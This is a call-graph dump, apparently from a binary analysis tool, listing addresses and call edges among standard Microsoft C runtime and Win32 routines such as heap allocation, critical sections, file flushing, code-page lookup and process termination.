14926 134918 ctype 43 API calls 14925->14926 14927 13136d 14926->14927 14927->14916 14935 131587 14928->14935 14930 131578 _Deallocate 14930->14919 14932 13115c 14931->14932 14943 1315d1 14932->14943 14934 13116b 14934->14916 14938 131591 14935->14938 14936 1315b3 14936->14930 14937 131587 41 API calls 14937->14938 14938->14936 14938->14937 14940 1315b8 14938->14940 14941 131dfe std::ios_base::_Init 41 API calls 14940->14941 14942 1315c5 _Deallocate 14941->14942 14942->14938 14944 1315dd __EH_prolog3_catch 14943->14944 14945 131a71 51 API calls 14944->14945 14950 13161a 14945->14950 14946 131eb1 std::ios_base::_Init 43 API calls 14947 131731 14946->14947 14948 131b4b 51 API calls 14947->14948 14949 131739 ctype 14948->14949 14949->14934 14950->14946 14952 13e14a ___scrt_uninitialize_crt 14951->14952 14953 13e138 14951->14953 14952->14494 14954 13e146 14953->14954 14956 1397ed 14953->14956 14954->14494 14959 13967a 14956->14959 14962 13956e 14959->14962 14963 13957a ___scrt_is_nonwritable_in_current_image 14962->14963 14970 13a8b5 EnterCriticalSection 14963->14970 14965 1395f0 14979 13960e 14965->14979 14967 139584 ___scrt_uninitialize_crt 14967->14965 14971 1394e2 14967->14971 14970->14967 14972 1394ee ___scrt_is_nonwritable_in_current_image 14971->14972 14982 139365 EnterCriticalSection 14972->14982 14974 1394f8 ___scrt_uninitialize_crt 14978 139531 14974->14978 14983 139788 14974->14983 14996 139562 14978->14996 15098 13a8fd LeaveCriticalSection 14979->15098 14981 1395fc 14981->14954 14982->14974 14984 13979d _Fputc 14983->14984 14985 1397a4 14984->14985 14986 1397af 14984->14986 14988 13967a ___scrt_uninitialize_crt 70 API calls 14985->14988 14999 13971f 14986->14999 14995 1397aa 14988->14995 14990 138e3b _Fputc 41 API calls 14992 1397e7 14990->14992 14992->14978 14993 1397d0 15012 13fd51 14993->15012 14995->14990 15097 139379 LeaveCriticalSection 14996->15097 14998 139550 14998->14967 15000 139738 14999->15000 15004 13975f 14999->15004 15001 13fa79 _Fputc 41 API calls 15000->15001 15000->15004 15002 139754 15001->15002 15023 14057c 15002->15023 15004->14995 15005 13fa79 15004->15005 15006 13fa85 15005->15006 15007 13fa9a 15005->15007 15008 13b318 __strnicoll 14 API calls 15006->15008 15007->14993 15009 13fa8a 15008->15009 15010 139102 __strnicoll 41 API calls 15009->15010 15011 13fa95 15010->15011 15011->14993 15013 13fd62 15012->15013 15014 13fd6f 15012->15014 15015 13b318 __strnicoll 14 API calls 15013->15015 15016 13fdb8 15014->15016 15018 13fd96 15014->15018 15020 13fd67 15015->15020 15017 13b318 __strnicoll 14 API calls 15016->15017 15019 13fdbd 15017->15019 15064 13fcaf 15018->15064 15022 139102 __strnicoll 41 API calls 15019->15022 15020->14995 15022->15020 15024 140588 ___scrt_is_nonwritable_in_current_image 15023->15024 15025 14064c 15024->15025 15027 1405dd 15024->15027 15033 140590 15024->15033 15026 139085 _Fputc 29 API calls 15025->15026 15026->15033 15034 14578d EnterCriticalSection 15027->15034 15029 1405e3 15030 140600 15029->15030 15035 140684 15029->15035 15061 140644 15030->15061 15033->15004 15034->15029 15036 1406a9 15035->15036 15060 1406cc __fread_nolock 15035->15060 15037 1406ad 15036->15037 15039 14070b 15036->15039 15038 139085 _Fputc 29 API calls 15037->15038 15038->15060 15040 140722 15039->15040 15042 141e62 ___scrt_uninitialize_crt 43 API calls 15039->15042 15041 140208 ___scrt_uninitialize_crt 42 API calls 15040->15041 15043 14072c 15041->15043 15042->15040 15044 140772 15043->15044 15045 140732 15043->15045 15048 1407d5 WriteFile 15044->15048 15049 140786 15044->15049 15046 14075c 15045->15046 15047 140739 15045->15047 15050 13fdce ___scrt_uninitialize_crt 47 API calls 15046->15050 15055 1401a0 ___scrt_uninitialize_crt 6 API calls 15047->15055 15047->15060 15051 1407f7 GetLastError 15048->15051 15048->15060 15052 1407c3 15049->15052 15053 14078e 15049->15053 15050->15060 15051->15060 15056 140286 ___scrt_uninitialize_crt 7 API calls 15052->15056 15054 1407b1 15053->15054 15057 140793 15053->15057 15058 14044a ___scrt_uninitialize_crt 8 API calls 15054->15058 15055->15060 15056->15060 15059 140361 ___scrt_uninitialize_crt 7 API calls 15057->15059 15057->15060 15058->15060 15059->15060 15060->15030 15062 1457b0 ___scrt_uninitialize_crt LeaveCriticalSection 15061->15062 15063 14064a 15062->15063 15063->15033 15065 13fcbb ___scrt_is_nonwritable_in_current_image 15064->15065 15077 14578d EnterCriticalSection 15065->15077 15067 13fcca 15076 13fd0f 15067->15076 15078 145864 15067->15078 15069 13b318 __strnicoll 14 API calls 15071 13fd16 15069->15071 15070 13fcf6 FlushFileBuffers 15070->15071 15072 13fd02 GetLastError 15070->15072 15094 13fd45 15071->15094 15091 13b305 15072->15091 15076->15069 15077->15067 15079 145871 15078->15079 15081 145886 15078->15081 15080 13b305 __dosmaperr 14 API calls 15079->15080 15083 145876 15080->15083 15082 13b305 __dosmaperr 14 API calls 15081->15082 15086 1458ab 15081->15086 15084 1458b6 15082->15084 15085 13b318 __strnicoll 14 API calls 15083->15085 15087 13b318 __strnicoll 14 API calls 15084->15087 15088 14587e 15085->15088 15086->15070 15089 1458be 15087->15089 15088->15070 15090 139102 __strnicoll 41 API calls 15089->15090 15090->15088 15092 13ede1 __strnicoll 14 API calls 15091->15092 15093 13b30a 15092->15093 15093->15076 15095 1457b0 ___scrt_uninitialize_crt LeaveCriticalSection 15094->15095 15096 13fd2e 15095->15096 15096->15020 15097->14998 15098->14981 16680 13c8a8 16683 13c574 16680->16683 16684 13c580 ___scrt_is_nonwritable_in_current_image 16683->16684 16691 13a8b5 EnterCriticalSection 16684->16691 16686 13c5b8 16692 13c5d6 16686->16692 16687 13c58a 16687->16686 16689 1468fb __Getctype 14 API calls 16687->16689 16689->16687 16691->16687 16695 13a8fd LeaveCriticalSection 16692->16695 16694 13c5c4 16695->16694 16703 1392d3 16704 1397ed ___scrt_uninitialize_crt 70 API calls 16703->16704 16705 1392db 16704->16705 16713 13f79c 16705->16713 16707 1392e0 16723 13f847 16707->16723 16710 13930a 16711 13efd8 ___free_lconv_mon 14 API calls 16710->16711 16712 139315 16711->16712 16714 13f7a8 ___scrt_is_nonwritable_in_current_image 16713->16714 16727 13a8b5 EnterCriticalSection 16714->16727 16716 13f81f 16734 13f83e 16716->16734 16719 13f7f3 DeleteCriticalSection 16720 13efd8 ___free_lconv_mon 14 API calls 16719->16720 16722 13f7b3 16720->16722 16722->16716 16722->16719 16728 1394b2 16722->16728 16724 1392ef DeleteCriticalSection 16723->16724 16725 13f85e 16723->16725 16724->16707 16724->16710 16725->16724 16726 13efd8 ___free_lconv_mon 14 API calls 16725->16726 16726->16724 16727->16722 16729 1394c5 _Fputc 16728->16729 16737 13938d 16729->16737 16731 1394d1 16732 138e3b _Fputc 41 API calls 16731->16732 16733 1394dd 16732->16733 16733->16722 16809 13a8fd LeaveCriticalSection 16734->16809 16736 13f82b 16736->16707 16738 139399 ___scrt_is_nonwritable_in_current_image 16737->16738 16739 1393a3 16738->16739 16740 1393c6 16738->16740 16741 139085 _Fputc 29 API calls 16739->16741 16747 1393be 16740->16747 16748 139365 EnterCriticalSection 16740->16748 16741->16747 16743 1393e4 16749 139424 16743->16749 16745 1393f1 16763 13941c 16745->16763 16747->16731 16748->16743 16750 139431 16749->16750 16751 139454 16749->16751 16752 139085 _Fputc 29 API calls 16750->16752 16753 13971f ___scrt_uninitialize_crt 66 API calls 16751->16753 16761 13944c 16751->16761 16752->16761 16754 13946c 16753->16754 16755 13f847 14 API calls 16754->16755 16756 139474 16755->16756 16757 13fa79 _Fputc 41 API calls 16756->16757 16758 139480 16757->16758 16766 13fb31 16758->16766 16761->16745 16762 13efd8 ___free_lconv_mon 14 API calls 16762->16761 16808 139379 LeaveCriticalSection 16763->16808 16765 139422 16765->16747 16767 13fb5a 16766->16767 16770 139487 16766->16770 16768 13fba9 16767->16768 16771 13fb81 16767->16771 16769 139085 _Fputc 29 API calls 16768->16769 16769->16770 16770->16761 16770->16762 16773 13faa0 16771->16773 16774 13faac ___scrt_is_nonwritable_in_current_image 16773->16774 16781 14578d EnterCriticalSection 16774->16781 16776 13faba 16778 13faeb 16776->16778 16782 13fbd4 16776->16782 16795 13fb25 16778->16795 16781->16776 16783 145864 __fread_nolock 41 API calls 16782->16783 16786 13fbe4 16783->16786 16784 13fbea 16798 1457d3 16784->16798 16786->16784 16787 13fc1c 16786->16787 16788 145864 __fread_nolock 41 API calls 16786->16788 16787->16784 16789 145864 __fread_nolock 41 API calls 16787->16789 16791 13fc13 16788->16791 16790 13fc28 CloseHandle 16789->16790 16790->16784 16792 13fc34 GetLastError 16790->16792 16793 145864 __fread_nolock 41 API calls 16791->16793 16792->16784 16793->16787 16794 13fc42 __fread_nolock 16794->16778 16807 1457b0 LeaveCriticalSection 16795->16807 16797 13fb0e 16797->16770 16799 1457e2 16798->16799 16800 145849 16798->16800 16799->16800 16805 14580c 16799->16805 16801 13b318 __strnicoll 14 API calls 16800->16801 16802 14584e 16801->16802 16803 13b305 __dosmaperr 14 API calls 16802->16803 16804 145839 16803->16804 16804->16794 16805->16804 16806 145833 SetStdHandle 16805->16806 16806->16804 16807->16797 16808->16765 16809->16736 13679 144ee4 13680 144eed 13679->13680 13681 144f1f 13679->13681 13685 13ed4b 13680->13685 13686 13ed56 13685->13686 13687 13ed5c 13685->13687 13736 13f4c4 13686->13736 13691 13ed62 13687->13691 13741 13f503 13687->13741 13693 13ed67 13691->13693 13764 13b237 13691->13764 13692 13ed7a 13746 13ef7b 13692->13746 13713 144cef 13693->13713 13698 13eda3 13700 13f503 __Getctype 6 API calls 13698->13700 13699 13ed8e 13701 13f503 __Getctype 6 API calls 13699->13701 13702 13edaf 13700->13702 13703 13ed9a 13701->13703 13704 13edb3 13702->13704 13705 13edc2 13702->13705 13753 13efd8 13703->13753 13706 13f503 __Getctype 6 API calls 13704->13706 13759 13eabe 13705->13759 13706->13703 13711 13efd8 ___free_lconv_mon 14 API calls 13712 13edd4 13711->13712 13712->13693 14205 144e44 13713->14205 13718 144d32 13718->13681 13721 144d59 14232 144f3f 13721->14232 13722 144d4b 13723 13efd8 ___free_lconv_mon 14 API calls 13722->13723 13723->13718 13726 144d91 13728 13b318 __strnicoll 14 API calls 13726->13728 13727 144dac 13730 144dd8 13727->13730 13735 13efd8 ___free_lconv_mon 14 API calls 13727->13735 13729 144d96 13728->13729 13731 13efd8 ___free_lconv_mon 14 API calls 13729->13731 13732 144e21 13730->13732 14243 144961 13730->14243 13731->13718 13734 13efd8 ___free_lconv_mon 14 API calls 13732->13734 13734->13718 13735->13730 13775 13f2b3 13736->13775 13739 13f4fb TlsGetValue 13740 13f4e9 13740->13687 13742 13f2b3 std::_Lockit::_Lockit 5 API calls 13741->13742 13743 13f51f 13742->13743 13744 13ed76 13743->13744 13745 13f53d TlsSetValue 13743->13745 13744->13691 13744->13692 13751 13ef88 __Getctype 13746->13751 13747 13efc8 13793 13b318 13747->13793 13748 13efb3 HeapAlloc 13749 13ed86 13748->13749 13748->13751 13749->13698 13749->13699 13751->13747 13751->13748 13790 13dc55 13751->13790 13754 13efe3 HeapFree 13753->13754 13758 13eda0 13753->13758 13755 13eff8 GetLastError 13754->13755 13754->13758 13756 13f005 __dosmaperr 13755->13756 13757 13b318 __strnicoll 12 API calls 13756->13757 13757->13758 13758->13691 13830 13e952 13759->13830 13972 142f8a 13764->13972 13767 13b247 13769 13b270 13767->13769 13770 13b251 IsProcessorFeaturePresent 13767->13770 14008 13c42e 13769->14008 13771 13b25d 13770->13771 14002 138f06 13771->14002 13776 13f2e1 13775->13776 13777 13f2dd 13775->13777 13776->13777 13782 13f1e8 13776->13782 13777->13739 13777->13740 13780 13f2fb GetProcAddress 13780->13777 13781 13f30b std::_Lockit::_Lockit 13780->13781 13781->13777 13788 13f1f9 ___vcrt_FlsFree 13782->13788 13783 13f28f 13783->13777 13783->13780 13784 13f217 LoadLibraryExW 13785 13f232 GetLastError 13784->13785 13786 13f296 13784->13786 13785->13788 13786->13783 13787 13f2a8 FreeLibrary 13786->13787 13787->13783 13788->13783 13788->13784 13789 13f265 LoadLibraryExW 13788->13789 13789->13786 13789->13788 13796 13dc82 13790->13796 13807 13ede1 GetLastError 13793->13807 13795 13b31d 13795->13749 13797 13dc8e ___scrt_is_nonwritable_in_current_image 13796->13797 13802 13a8b5 EnterCriticalSection 13797->13802 13799 13dc99 13803 13dcd5 13799->13803 13802->13799 13806 13a8fd LeaveCriticalSection 13803->13806 13805 13dc60 13805->13751 13806->13805 13808 13edf7 13807->13808 13811 13edfd 13807->13811 13809 13f4c4 __Getctype 6 API calls 13808->13809 13809->13811 13810 13f503 __Getctype 6 API calls 13812 13ee19 13810->13812 13811->13810 13828 13ee01 SetLastError 13811->13828 13813 13ef7b __Getctype 12 API calls 13812->13813 13812->13828 13815 13ee2e 13813->13815 13816 13ee47 13815->13816 13817 13ee36 13815->13817 13819 13f503 __Getctype 6 API calls 13816->13819 13818 13f503 __Getctype 6 API calls 13817->13818 13820 13ee44 13818->13820 13821 13ee53 13819->13821 13825 13efd8 ___free_lconv_mon 12 API calls 13820->13825 13822 13ee57 13821->13822 13823 13ee6e 13821->13823 13824 13f503 __Getctype 6 API calls 13822->13824 13826 13eabe __Getctype 12 API calls 13823->13826 13824->13820 13825->13828 13827 13ee79 13826->13827 13829 13efd8 ___free_lconv_mon 12 API calls 13827->13829 13828->13795 13829->13828 13831 13e95e ___scrt_is_nonwritable_in_current_image 13830->13831 13844 13a8b5 EnterCriticalSection 13831->13844 13833 13e968 13845 13e998 13833->13845 13836 13ea64 13837 13ea70 ___scrt_is_nonwritable_in_current_image 13836->13837 13849 13a8b5 EnterCriticalSection 13837->13849 13839 13ea7a 13850 13ec45 13839->13850 13841 13ea92 13854 13eab2 13841->13854 13844->13833 13848 13a8fd LeaveCriticalSection 13845->13848 13847 13e986 13847->13836 13848->13847 13849->13839 13851 13ec7b __Getctype 13850->13851 13852 13ec54 __Getctype 13850->13852 13851->13841 13852->13851 13857 14662e 13852->13857 13971 13a8fd LeaveCriticalSection 13854->13971 13856 13eaa0 13856->13711 13859 1466ae 13857->13859 13860 146644 13857->13860 13861 13efd8 ___free_lconv_mon 14 API calls 13859->13861 13883 1466fc 13859->13883 13860->13859 13863 146677 13860->13863 13867 13efd8 ___free_lconv_mon 14 API calls 13860->13867 13862 1466d0 13861->13862 13865 13efd8 ___free_lconv_mon 14 API calls 13862->13865 13864 146699 13863->13864 13873 13efd8 ___free_lconv_mon 14 API calls 13863->13873 13866 13efd8 ___free_lconv_mon 14 API calls 13864->13866 13868 1466e3 13865->13868 13869 1466a3 13866->13869 13871 14666c 13867->13871 13874 13efd8 ___free_lconv_mon 14 API calls 13868->13874 13875 13efd8 ___free_lconv_mon 14 API calls 13869->13875 13870 14676a 13876 13efd8 ___free_lconv_mon 14 API calls 13870->13876 13885 1458e4 13871->13885 13872 14670a 13872->13870 13884 13efd8 14 API calls ___free_lconv_mon 13872->13884 13878 14668e 13873->13878 13879 1466f1 13874->13879 13875->13859 13882 146770 13876->13882 13913 145d98 13878->13913 13881 13efd8 ___free_lconv_mon 14 API calls 13879->13881 13881->13883 13882->13851 13925 14679f 13883->13925 13884->13872 13886 1458f5 13885->13886 13912 1459de 13885->13912 13887 145906 13886->13887 13888 13efd8 ___free_lconv_mon 14 API calls 13886->13888 13889 145918 13887->13889 13890 13efd8 ___free_lconv_mon 14 API calls 13887->13890 13888->13887 13891 14592a 13889->13891 13892 13efd8 ___free_lconv_mon 14 API calls 13889->13892 13890->13889 13893 13efd8 ___free_lconv_mon 14 API calls 13891->13893 13894 14593c 13891->13894 13892->13891 13893->13894 13895 13efd8 ___free_lconv_mon 14 API calls 13894->13895 13897 14594e 13894->13897 13895->13897 13896 145960 13899 145972 13896->13899 13900 13efd8 ___free_lconv_mon 14 API calls 13896->13900 13897->13896 13898 13efd8 ___free_lconv_mon 14 API calls 13897->13898 13898->13896 13901 145984 13899->13901 13902 13efd8 ___free_lconv_mon 14 API calls 13899->13902 13900->13899 13903 145996 13901->13903 13904 13efd8 ___free_lconv_mon 14 API calls 13901->13904 13902->13901 13905 1459a8 13903->13905 13906 13efd8 ___free_lconv_mon 14 API calls 13903->13906 13904->13903 13907 1459ba 13905->13907 13908 13efd8 ___free_lconv_mon 14 API calls 13905->13908 13906->13905 13909 1459cc 13907->13909 13910 13efd8 ___free_lconv_mon 14 API calls 13907->13910 13908->13907 13911 13efd8 ___free_lconv_mon 14 API calls 13909->13911 13909->13912 13910->13909 13911->13912 13912->13863 13914 145da5 13913->13914 13924 145dfd 13913->13924 13915 145db5 13914->13915 13916 13efd8 ___free_lconv_mon 14 API calls 13914->13916 13917 13efd8 ___free_lconv_mon 14 API calls 13915->13917 13918 145dc7 13915->13918 13916->13915 13917->13918 13919 145dd9 13918->13919 13920 13efd8 ___free_lconv_mon 14 API calls 13918->13920 13921 145deb 13919->13921 13922 13efd8 ___free_lconv_mon 14 API calls 13919->13922 13920->13919 13923 13efd8 ___free_lconv_mon 14 API calls 13921->13923 13921->13924 13922->13921 13923->13924 13924->13864 13926 1467cb 13925->13926 13927 1467ac 13925->13927 13926->13872 13927->13926 13931 1462b3 13927->13931 13930 13efd8 ___free_lconv_mon 14 API calls 13930->13926 13932 1462c4 13931->13932 13966 146391 13931->13966 13967 146012 13932->13967 13935 146012 __Getctype 14 API calls 13936 1462d7 13935->13936 13937 146012 __Getctype 14 API calls 13936->13937 13938 1462e2 13937->13938 13939 146012 __Getctype 14 API calls 13938->13939 13940 1462ed 13939->13940 13941 146012 __Getctype 14 API calls 13940->13941 13942 1462fb 13941->13942 13943 13efd8 ___free_lconv_mon 14 API calls 13942->13943 13944 146306 13943->13944 13945 13efd8 ___free_lconv_mon 14 API calls 13944->13945 13946 146311 13945->13946 13947 13efd8 ___free_lconv_mon 14 API calls 13946->13947 13948 14631c 13947->13948 13949 146012 __Getctype 14 API calls 13948->13949 13950 14632a 13949->13950 13951 146012 __Getctype 14 API calls 13950->13951 13952 146338 13951->13952 13953 146012 __Getctype 14 API calls 13952->13953 13954 146349 13953->13954 13955 146012 __Getctype 14 API calls 13954->13955 13956 146357 13955->13956 13957 146012 __Getctype 14 API calls 13956->13957 13958 146365 13957->13958 13959 13efd8 ___free_lconv_mon 14 API calls 13958->13959 13960 146370 13959->13960 13961 13efd8 ___free_lconv_mon 14 API calls 13960->13961 13962 14637b 13961->13962 13963 13efd8 ___free_lconv_mon 14 API calls 13962->13963 13964 146386 13963->13964 13965 13efd8 ___free_lconv_mon 14 API calls 13964->13965 13965->13966 13966->13930 13968 146024 13967->13968 13969 146033 13968->13969 13970 13efd8 ___free_lconv_mon 14 API calls 13968->13970 13969->13935 13970->13968 13971->13856 14011 142ebc 13972->14011 13975 142fcf 13976 142fdb ___scrt_is_nonwritable_in_current_image 13975->13976 13977 13ede1 __strnicoll 14 API calls 13976->13977 13980 143008 __purecall 13976->13980 13982 143002 __purecall 13976->13982 13977->13982 13978 14304f 13979 13b318 __strnicoll 14 API calls 13978->13979 13981 143054 13979->13981 13984 14307b 13980->13984 14025 13a8b5 EnterCriticalSection 13980->14025 14022 139102 13981->14022 13982->13978 13982->13980 14001 143039 13982->14001 13987 1430bd 13984->13987 13988 1431ae 13984->13988 13998 1430ec 13984->13998 13987->13998 14026 13ec90 GetLastError 13987->14026 13990 1431b9 13988->13990 14057 13a8fd LeaveCriticalSection 13988->14057 13991 13c42e __purecall 23 API calls 13990->13991 13993 1431c1 13991->13993 13995 13ec90 __Getctype 41 API calls 13999 143141 13995->13999 13997 13ec90 __Getctype 41 API calls 13997->13998 14053 14315b 13998->14053 14000 13ec90 __Getctype 41 API calls 13999->14000 13999->14001 14000->14001 14001->13767 14003 138f22 __fread_nolock __purecall 14002->14003 14004 138f4e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14003->14004 14007 13901f __purecall 14004->14007 14006 13903d 14006->13769 14120 134956 14007->14120 14128 13c252 14008->14128 14012 142ec8 ___scrt_is_nonwritable_in_current_image 14011->14012 14017 13a8b5 EnterCriticalSection 14012->14017 14014 142ed6 14018 142f14 14014->14018 14017->14014 14021 13a8fd LeaveCriticalSection 14018->14021 14020 13b23c 14020->13767 14020->13975 14021->14020 14058 13904e 14022->14058 14025->13984 14027 13eca6 14026->14027 14032 13ecac 14026->14032 14029 13f4c4 __Getctype 6 API calls 14027->14029 14028 13f503 __Getctype 6 API calls 14030 13ecc8 14028->14030 14029->14032 14031 13ecb0 SetLastError 14030->14031 14034 13ef7b __Getctype 14 API calls 14030->14034 14036 13ed40 14031->14036 14037 13ed45 14031->14037 14032->14028 14032->14031 14035 13ecdd 14034->14035 14038 13ecf6 14035->14038 14039 13ece5 14035->14039 14036->13997 14040 13b237 __purecall 39 API calls 14037->14040 14042 13f503 __Getctype 6 API calls 14038->14042 14041 13f503 __Getctype 6 API calls 14039->14041 14043 13ed4a 14040->14043 14044 13ecf3 14041->14044 14045 13ed02 14042->14045 14048 13efd8 ___free_lconv_mon 14 API calls 14044->14048 14046 13ed06 14045->14046 14047 13ed1d 14045->14047 14050 13f503 __Getctype 6 API calls 14046->14050 14049 13eabe __Getctype 14 API calls 14047->14049 14048->14031 14051 13ed28 14049->14051 14050->14044 14052 13efd8 ___free_lconv_mon 14 API calls 14051->14052 14052->14031 14054 143161 14053->14054 14055 143132 14053->14055 14119 13a8fd LeaveCriticalSection 14054->14119 14055->13995 14055->13999 14055->14001 14057->13990 14059 139060 _Fputc 14058->14059 14064 139085 14059->14064 14065 13909c 14064->14065 14066 139095 14064->14066 14068 139078 14065->14068 14083 138e77 14065->14083 14079 138ea0 GetLastError 14066->14079 14073 138e3b 14068->14073 14070 1390d1 14070->14068 14086 13912f IsProcessorFeaturePresent 14070->14086 14072 139101 14074 138e47 14073->14074 14075 138e5e 14074->14075 14112 138ee6 14074->14112 14077 138e71 14075->14077 14078 138ee6 _Fputc 41 API calls 14075->14078 14077->14001 14078->14077 14080 138eb9 14079->14080 14090 13ee92 14080->14090 14084 138e82 GetLastError SetLastError 14083->14084 14085 138e9b 14083->14085 14084->14070 14085->14070 14087 13913b 14086->14087 14088 138f06 __purecall 8 API calls 14087->14088 14089 139150 GetCurrentProcess TerminateProcess 14088->14089 14089->14072 14091 13eea5 14090->14091 14092 13eeab 14090->14092 14093 13f4c4 __Getctype 6 API calls 14091->14093 14094 13f503 __Getctype 6 API calls 14092->14094 14096 138ed1 SetLastError 14092->14096 14093->14092 14095 13eec5 14094->14095 14095->14096 14097 13ef7b __Getctype 14 API calls 14095->14097 14096->14065 14098 13eed5 14097->14098 14099 13eef2 14098->14099 14100 13eedd 14098->14100 14102 13f503 __Getctype 6 API calls 14099->14102 14101 13f503 __Getctype 6 API calls 14100->14101 14110 13eee9 14101->14110 14103 13eefe 14102->14103 14104 13ef02 14103->14104 14105 13ef11 14103->14105 14108 13f503 __Getctype 6 API calls 14104->14108 14106 13eabe __Getctype 14 API calls 14105->14106 14109 13ef1c 14106->14109 14107 13efd8 ___free_lconv_mon 14 API calls 14107->14096 14108->14110 14111 13efd8 ___free_lconv_mon 14 API calls 14109->14111 14110->14107 14111->14096 14113 138ef0 14112->14113 14114 138ef9 14112->14114 14115 138ea0 _Fputc 16 API calls 14113->14115 14114->14075 14116 138ef5 14115->14116 14116->14114 14117 13b237 __purecall 41 API calls 14116->14117 14118 138f02 14117->14118 14119->14055 14121 13495f IsProcessorFeaturePresent 14120->14121 14122 13495e 14120->14122 14124 135274 14121->14124 14122->14006 14127 135237 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14124->14127 14126 135357 14126->14006 14127->14126 14129 13c291 14128->14129 14130 13c27f 14128->14130 14140 13c11a 14129->14140 14155 13c31a GetModuleHandleW 14130->14155 14135 13b27a 14139 13c2e3 14141 13c126 ___scrt_is_nonwritable_in_current_image 14140->14141 14163 13a8b5 EnterCriticalSection 14141->14163 14143 13c130 14164 13c167 14143->14164 14145 13c13d 14168 13c15b 14145->14168 14148 13c2e9 14193 13c35d 14148->14193 14151 13c307 14153 13c37f __purecall 3 API calls 14151->14153 14152 13c2f7 GetCurrentProcess TerminateProcess 14152->14151 14154 13c30f ExitProcess 14153->14154 14156 13c284 14155->14156 14156->14129 14157 13c37f GetModuleHandleExW 14156->14157 14158 13c3df 14157->14158 14159 13c3be GetProcAddress 14157->14159 14160 13c3e5 FreeLibrary 14158->14160 14161 13c290 14158->14161 14159->14158 14162 13c3d2 14159->14162 14160->14161 14161->14129 14162->14158 14163->14143 14165 13c173 ___scrt_is_nonwritable_in_current_image 14164->14165 14166 13c1da __purecall 14165->14166 14171 13df86 14165->14171 14166->14145 14192 13a8fd LeaveCriticalSection 14168->14192 14170 13c149 14170->14135 14170->14148 14172 13df92 __EH_prolog3 14171->14172 14175 13dcde 14172->14175 14174 13dfb9 ctype 14174->14166 14176 13dcea ___scrt_is_nonwritable_in_current_image 14175->14176 14183 13a8b5 EnterCriticalSection 14176->14183 14178 13dcf8 14184 13de96 14178->14184 14183->14178 14185 13deb5 14184->14185 14186 13dd05 14184->14186 14185->14186 14187 13efd8 ___free_lconv_mon 14 API calls 14185->14187 14188 13dd2d 14186->14188 14187->14186 14191 13a8fd LeaveCriticalSection 14188->14191 14190 13dd16 14190->14174 14191->14190 14192->14170 14198 14560e GetPEB 14193->14198 14196 13c367 GetPEB 14197 13c2f3 14196->14197 14197->14151 14197->14152 14199 13c362 14198->14199 14200 145628 14198->14200 14199->14196 14199->14197 14202 13f336 14200->14202 14203 13f2b3 std::_Lockit::_Lockit 5 API calls 14202->14203 14204 13f352 14203->14204 14204->14199 14206 144e50 ___scrt_is_nonwritable_in_current_image 14205->14206 14212 144e6a 14206->14212 14251 13a8b5 EnterCriticalSection 14206->14251 14209 13b237 __purecall 41 API calls 14213 144ee3 14209->14213 14210 144d19 14216 144a6f 14210->14216 14211 144ea6 14252 144ec3 14211->14252 14212->14209 14212->14210 14214 144e7a 14214->14211 14215 13efd8 ___free_lconv_mon 14 API calls 14214->14215 14215->14211 14256 13b32b 14216->14256 14219 144a90 GetOEMCP 14221 144ab9 14219->14221 14220 144aa2 14220->14221 14222 144aa7 GetACP 14220->14222 14221->13718 14223 142001 14221->14223 14222->14221 14224 14203f 14223->14224 14225 14200f 14223->14225 14226 13b318 __strnicoll 14 API calls 14224->14226 14227 14202a HeapAlloc 14225->14227 14230 142013 __Getctype 14225->14230 14229 142044 14226->14229 14228 14203d 14227->14228 14227->14230 14228->14229 14229->13721 14229->13722 14230->14224 14230->14227 14231 13dc55 ctype 2 API calls 14230->14231 14231->14230 14233 144a6f 43 API calls 14232->14233 14234 144f5f 14233->14234 14236 144f9c IsValidCodePage 14234->14236 14240 144fd8 __fread_nolock 14234->14240 14235 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14237 144d86 14235->14237 14238 144fae 14236->14238 14236->14240 14237->13726 14237->13727 14239 144fdd GetCPInfo 14238->14239 14242 144fb7 __fread_nolock 14238->14242 14239->14240 14239->14242 14240->14235 14299 144b43 14242->14299 14244 14496d ___scrt_is_nonwritable_in_current_image 14243->14244 14389 13a8b5 EnterCriticalSection 14244->14389 14246 144977 14390 1449ae 14246->14390 14251->14214 14255 13a8fd LeaveCriticalSection 14252->14255 14254 144eca 14254->14212 14255->14254 14257 13b349 14256->14257 14263 13b342 14256->14263 14258 13ec90 __Getctype 41 API calls 14257->14258 14257->14263 14259 13b36a 14258->14259 14264 1426fa 14259->14264 14263->14219 14263->14220 14265 14270d 14264->14265 14267 13b380 14264->14267 14265->14267 14272 14687a 14265->14272 14268 142758 14267->14268 14269 142780 14268->14269 14270 14276b 14268->14270 14269->14263 14270->14269 14294 144f2c 14270->14294 14273 146886 ___scrt_is_nonwritable_in_current_image 14272->14273 14274 13ec90 __Getctype 41 API calls 14273->14274 14275 14688f 14274->14275 14276 1468d5 14275->14276 14285 13a8b5 EnterCriticalSection 14275->14285 14276->14267 14278 1468ad 14286 1468fb 14278->14286 14283 13b237 __purecall 41 API calls 14284 1468fa 14283->14284 14285->14278 14287 1468be 14286->14287 14288 146909 __Getctype 14286->14288 14290 1468da 14287->14290 14288->14287 14289 14662e __Getctype 14 API calls 14288->14289 14289->14287 14293 13a8fd LeaveCriticalSection 14290->14293 14292 1468d1 14292->14276 14292->14283 14293->14292 14295 13ec90 __Getctype 41 API calls 14294->14295 14296 144f31 14295->14296 14297 144e44 __strnicoll 41 API calls 14296->14297 14298 144f3c 14297->14298 14298->14269 14300 144b6b GetCPInfo 14299->14300 14301 144c34 14299->14301 14300->14301 14306 144b83 14300->14306 14302 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14301->14302 14304 144ced 14302->14304 14304->14240 14310 142b18 14306->14310 14309 142e0f 46 API calls 14309->14301 14311 13b32b __strnicoll 41 API calls 14310->14311 14312 142b38 14311->14312 14330 143db8 14312->14330 14314 142bfc 14317 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14314->14317 14315 142bf4 14333 1346a9 14315->14333 14316 142b65 14316->14314 14316->14315 14319 142001 std::_Locinfo::_Locinfo_ctor 15 API calls 14316->14319 14321 142b8a __fread_nolock __alloca_probe_16 14316->14321 14320 142c1f 14317->14320 14319->14321 14325 142e0f 14320->14325 14321->14315 14322 143db8 __strnicoll MultiByteToWideChar 14321->14322 14323 142bd5 14322->14323 14323->14315 14324 142be0 GetStringTypeW 14323->14324 14324->14315 14326 13b32b __strnicoll 41 API calls 14325->14326 14327 142e22 14326->14327 14340 142c21 